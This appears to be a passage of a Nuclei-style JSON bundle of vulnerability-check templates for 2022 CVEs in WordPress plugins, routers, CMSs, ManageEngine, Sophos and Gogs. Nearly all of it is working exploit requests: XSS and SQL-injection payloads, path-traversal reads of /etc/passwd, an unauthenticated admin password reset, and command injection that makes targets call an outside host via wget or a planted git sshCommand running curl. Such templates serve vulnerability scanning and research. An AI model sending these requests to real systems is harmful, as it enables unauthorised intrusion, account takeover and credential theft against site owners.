{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nxxx\"><img/src%3d'x'onerror%3dalert('document_domain')>=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img/src='x'onerror=alert('document_domain')>","moodle-editor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1170","info":{"name":"JobMonster < 4.5.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","noo-resume"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0817","info":{"name":"WordPress BadgeOS <=3.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, md5(num))","contains(content_type, \"application/json\")","contains(body, \"badgeos-arrange-buttons\")"],"condition":"and"}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-44947","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=&notes=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46463","info":{"name":"Harbor <=2.5.3 - Unauthorized Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v2.0/search?q=/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository_name","project_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1439","info":{"name":"Microweber <1.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div class='x module module-'onmouseover=alert(document.domain) '","parent-module-id"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40032","info":{"name":"Simple Task Managing System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /task/loginValidation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=test'%20AND%20(SELECT%208979%20FROM%20(SELECT(SLEEP(7-(IF(ORD(MID((SELECT%20DISTINCT(IFNULL(CAST(schema_name%20AS%20NCHAR)%2c0x20))%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%200%2c1)%2c12%2c1))%3e48%2c0%2c1)))))jaXJ)--%20HgKq&password=\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 302","contains(location, 'login.php')","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-31978","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_inquiry HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-23544","info":{"name":"MeterSphere < 2.5.0 SSRF","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/md/get/url?url=http://oast.pro"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2535","info":{"name":"SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"searchwp-live-search-result\")"],"condition":"and"}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; 